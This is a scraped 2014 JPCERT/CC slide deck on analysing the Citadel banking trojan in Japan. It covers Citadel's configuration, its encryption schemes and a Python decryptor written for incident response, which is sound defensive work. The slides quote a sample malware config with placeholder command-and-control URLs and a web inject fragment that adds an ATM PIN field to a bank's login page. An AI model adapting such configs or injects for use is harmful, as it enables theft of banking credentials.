View
894
Download
1
Embed Size (px)
DESCRIPTION
Lately in Japan the malware Citadel has been implicated in multiple internet banking unauthorised transaction incidents. Citadel is a type of malware much like the Zeus known as banking trojans. When the malware successfully infects the users environment it utilises special functions called Web Injects to alter the website displayed in the end users computer to steal login credentials for internet banking sites. To handle Citadel infection incidents, it is necessary to clarify whatsettings and what servers the Citadel malware uses and communicates totherefore its essential to have an in-depth knowledge of Citadel and to conduct research on the files left by Citadel. In this presentation I will present my findings on doing detailed analysis on Citadel and introduce data transmission reconstruction and file reconstruction tools which have been created to handle Citadel incidents. You Nakatsuru You 'Tsuru' Nakatsuru, CISSP is a "just married" Information Security Analyst of Analysis Center at JPCERT/CC (Japan Computer Emergency Response Team Coordination Center) since April 2013. His primary responsibilities are to analyze malware abused in highly sophisticated cyber attacks, along with R&D on advanced counter malware technologies and cutting-edge incident handling methods. He also takes an active role in capacity building for junior malware analysts.
Citation preview
Fight AgainstCitadel in Japan
2014/02/18JPCERT/CC Analysis CenterNAKATSURU You
Copyright©2014 JPCERT/CC All rights reserved.1
AgendaBackground—Unauthorized Remittance in Japan
Analyzing Citadel—Overview—Encryption
Making of Citadel DecryptorCitadel Decryptor—Usage—Demo
Copyright©2014 JPCERT/CC All rights reserved.2
BACKGROUND
Copyright©2014 JPCERT/CC All rights reserved.3
Illegal Transfer in Japan
$14million
$500k$3million
2011 2012 2013http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf
Targeting 32 Banks
Copyright©2014 JPCERT/CC All rights reserved.4
Related with Malware
http://www.npa.go.jp/cyber/pdf/H260131_banking.pdf
In most cases, passwords are retrieved and abused through defaced web pages
where malware request users to authenticate
Copyright©2014 JPCERT/CC All rights reserved.5
Banking Trojan
ZeuS
Ice IX
Citadel
GameOver
SpyEye Carberp etc.
Copyright©2014 JPCERT/CC All rights reserved.6
Why Citadel?
http://blog.trendmicro.com/trendlabs-security-intelligence/citadel-makes-a-comeback-targets-japan-users/
Copyright©2014 JPCERT/CC All rights reserved.7
Banking Trojan Incident
Back ConnectServer
WebPanel
Attacker
User
InternetBanking
Copyright©2014 JPCERT/CC All rights reserved.8
Web Injects
User
InternetBanking
Copyright©2014 JPCERT/CC All rights reserved.9
Web Injects Demo
Copyright©2014 JPCERT/CC All rights reserved.10
Builder & Web Panel
Copyright©2014 JPCERT/CC All rights reserved.11
Underground Market
Copyright©2014 JPCERT/CC All rights reserved.12
Our Incident Response
Back ConnectServer
WebPanel
Attacker
User
InternetBanking
Information Sharing
Copyright©2014 JPCERT/CC All rights reserved.13
Information We Need
Back ConnectServer
WebPanel
Attacker
User
InternetBanking
Which site is targeted
Where
Where
How
Where
Copyright©2014 JPCERT/CC All rights reserved.14
ANALYZING CITADEL
Copyright©2014 JPCERT/CC All rights reserved.15
External Information
LeakedCitadel
Web panel
Builder
LeakedZeuS
Web panel
Builder
ZeuSsource
Web panelsource
Buildersource
Binary
Debug info
Blogs
Sophos
LEXSI
Copyright©2014 JPCERT/CC All rights reserved.16
Analysis Method
•Retrieving information
Surface Analysis
•Monitoring tools, Sandbox and debugging
Runtime Analysis
•Reading source code, assembly code
Static Analysis
Copyright©2014 JPCERT/CC All rights reserved.17
Static AnalysisDiffing with ZeuS
Copyright©2014 JPCERT/CC All rights reserved.18
Citadel OverviewSending report
Current settings,etc.
Web Injects
Copyright©2014 JPCERT/CC All rights reserved.19
Configuration Files
•Default settings•Encryption key, URL of DynamicConfig
•Encoded and hardcoded
Base Config
•Additional settings•HTTP Injection, etc…
•Downloaded from servers
Dynamic Config
Copyright©2014 JPCERT/CC All rights reserved.20
botnet "CIT"timer_config 4 9timer_logs 3 6timer_stats 4 8timer_modules 1 4timer_autoupdate 8url_config1 "http://citadelhost/folder/file.php|file=config.dll"url_config2 "http://reserve-citadelhost/folder/file.php|file=config.dll"remove_certs 1disable_cookies 0encryption_key "key123"report_software 1enable_luhn10_get 0enable_luhn10_post 1disable_antivirus 0use_module_video 1antiemulation_enable 0disable_httpgrabber 0use_module_ffcookie 1
Base Config
Dynamic Config URL
Password to generate RC4 key
Copyright©2014 JPCERT/CC All rights reserved.21
Dynamic Configurl_loader "http://citadelhost/folder/file.php|file=soft.exe"url_server "http://citadelhost/folder/gate.php"file_webinjects "injects.txt"url_webinjects "http://citadelhost/folder/file.php"
entry "AdvancedConfigs""http://reserve-host1/folder/file.php|file=config.bin""http://reserve-host2/folder/file.php|file=config.bin"
endentry "WebFilters"
"#*wellsfargo.com/*""@*payment.com/*""!http://*.com/*.jpg"
end
(snip)
set_url https://www.wellsfargo.com/ GPdata_before<div><strong><label for="userid">Username</ladata_enddata_inject<input type="text" accesskey="U" id="userid" na<DIV><STRONG><LABEL for=userid>ATM Pin</Lstyle="WIDTH: 147px" tabIndex="2" maxLength=<DIV><STRONG><label for="password">Passwo<input type="password" accesskey="P" id="pass<input type="hidden" name="screenid" value="SI<input type="submit" value="Go" name="btnSign<input type="hidden" id="u_p" name="u_p" value</form>data_end
Copyright©2014 JPCERT/CC All rights reserved.22
Encryption
Copyright©2014 JPCERT/CC All rights reserved.23
Encrypted Data
Copyright©2014 JPCERT/CC All rights reserved.24
Encrypted Data
Packet
POST data(report file)
DynamicConfig
Additional modules
File
Report
Backup of additional modules
Registry
Current settings
Backup of Dynamic Config
Copyright©2014 JPCERT/CC All rights reserved.25
Encryption Method
• AES encryption and XOR encoding
AES+
• RC4 encryption and XOR encoding
RC4+
• Encryption of RC4+ twice
RC4+ * 2
• AES+ encryption using random generated key when installd
Installed Data
Copyright©2014 JPCERT/CC All rights reserved.26
In Case of Dynamic Config
BaseConfig
DynamicConfig
XOR
AES+
UCL
Copyright©2014 JPCERT/CC All rights reserved.27
0x400 Bytes Overlay
PE file PE file
Install setting Installed data
Before install After install
XOR key
ID, Install paths,AES key,
StrageArray key, etc.
Padding Padding
Copyright©2014 JPCERT/CC All rights reserved.28
Encryption Summary
Category Data Format Encryption
Packet
Report EncryptedBinStrage RC4+
Dynamic Config EncryptedBinStrage AES+
Additional modules Executable RC4+ * 2
FileReport file StrageArray Installed Data
Backup of modules StrageArray Installed Data
Registry Backup of DynamicConfig
EncryptedBinStrage Installed Data
Copyright©2014 JPCERT/CC All rights reserved.29
MAKING OFCITADEL DECRYPTOR
Copyright©2014 JPCERT/CC All rights reserved.30
Our GoalDecrypt data & retrieve information for incident response
Copyright©2014 JPCERT/CC All rights reserved.31
Implementation
Python PyCrypto
pefile UCL
Copyright©2014 JPCERT/CC All rights reserved.32
RC4+ Decryption
Get RC4 keystream
RC4
VisualDecrypt
Copyright©2014 JPCERT/CC All rights reserved.33
RC4+ Implementation
def rc4_plus_decrypt(login_key, base_key, buf):S1 = base_key['state']S2 = map(ord, login_key)out = ""i = j = k = 0for c in buf:
i = (i + 1) & 0xFFj = (j + S1[i]) & 0xFFS1[i], S1[j] = S1[j], S1[i]out += chr((ord(c) ^ S1[(S1[i]+S1[j])&0xFF])
^ S2[k%len(S2)])k += 1
return out
Copyright©2014 JPCERT/CC All rights reserved.34
Get AES key
AESDecrypt
VisualDecrypt
AES+ Decryption
Copyright©2014 JPCERT/CC All rights reserved.35
AES+ Implementation
def unpack_aes_plus(login_key, base_key, xor_key, aes_key, data):
aes = AES.new(aes_key)tmp = aes.decrypt(data)
out = ""for i in range(len(tmp)):
out += chr(ord(tmp[i]) ^ord(xor_key[i%len(xor_key)]))
return out
Copyright©2014 JPCERT/CC All rights reserved.36
Decryption Parameter
Base Config
RC4 key
InstalledData
StrageArraykey
Random AES key
Others
Salt
LoginKey
RC4 XOR key
Copyright©2014 JPCERT/CC All rights reserved.37
Obtaining Parameter
re.compile(".*¥x56¥xBA(..)¥x00¥x00¥x52¥x68(....)¥x50¥xE8....¥x8B¥x0D.*", re.DOTALL)
Copyright©2014 JPCERT/CC All rights reserved.38
UCL Decompress
http://www.oberhumer.com/opensource/ucl/
Copyright©2014 JPCERT/CC All rights reserved.39
UCL Decompress using ctypes
def _ucl_decompress(self, data):ucl = cdll.LoadLibrary(UCL)compressed = c_buffer(data)decompressed = c_buffer(DECOMPRESS_MAX_SIZE)decompressed_size = c_int()result = ucl.ucl_nrv2b_decompress_le32(
pointer(compressed),c_int(len(compressed.raw)),pointer(decompressed),pointer(decompressed_size))
return decompressed.raw[:decompressed_size.value]
Copyright©2014 JPCERT/CC All rights reserved.40
CITADEL DECRYPTOR
Copyright©2014 JPCERT/CC All rights reserved.41
Environment
• Citadel Decryptor is only available for 32bit environment
Windows + 32bit Python
• For AES decryption• Windows binary
• http://www.voidspace.org.uk/python/modules.shtml#pycrypto
PyCrypto
• A Python module for parsing PE file format (Windows executable)• For parsing PE sections to get decryption params
pefile
Copyright©2014 JPCERT/CC All rights reserved.42
Data Requirement
Encrypted data
Unpacked Citadel•RC4 key•XOR key for AES+•XOR key for RC4+ (LOGINKEY)•Salt for RC4+
Installed Citadel• Installed Data
•Random generated AES key•Random generated StrageArray key
Copyright©2014 JPCERT/CC All rights reserved.43
citadel_decryptor.pyEncrypted data & unpacked module are always required
>citadel_decryptor.pyusage: citadel_decryptor.py [-h] [-n] [-a] [-d]
[-o OUT] [-D] [-l LOGIN][-k KEY] [-x XOR] [-s SALT][-i INSTALLED][-m MODE] [-v]DAT EXE
citadel_decryptor.py: error: too few arguments
>
Copyright©2014 JPCERT/CC All rights reserved.44
Cheat SheetThe following options have to be specified as well as encrypted data and unpacked Citadel
Category Data Option
Packet
Report -m2
Dynamic Config -d
Additional modules -m3 -n
FileReport files -a -i [Installed Citadel]
Backup of modules -a -i [Installed Citadel]
Registry Backup of Dynamic Config -d -i [Installed Citadel]
Copyright©2014 JPCERT/CC All rights reserved.45
Demo
Copyright©2014 JPCERT/CC All rights reserved.46
Tips
Convert registry data to binary• Export data using regedit & convert them to binary
using the following FileInsight plugin• https://github.com/nmantani/FileInsight-plugins
Unpacking• It is easy to break on APIs
• WriteProcessMemory• CreateProcessW• VirtualFree / VirtualFreeEx / RtlFreeHeap
• Dump executable (not after allocated) from virtual memory• including 0x400 bytes overlay
Copyright©2014 JPCERT/CC All rights reserved.47
Future Tasks
We already have•ZeuS Decryptor
•Ver 2.0.8.9•Ver 2.9.6.1
• Ice IX Decryptor•etc.
We want•Gameover (P2P ZeuS) Decryptor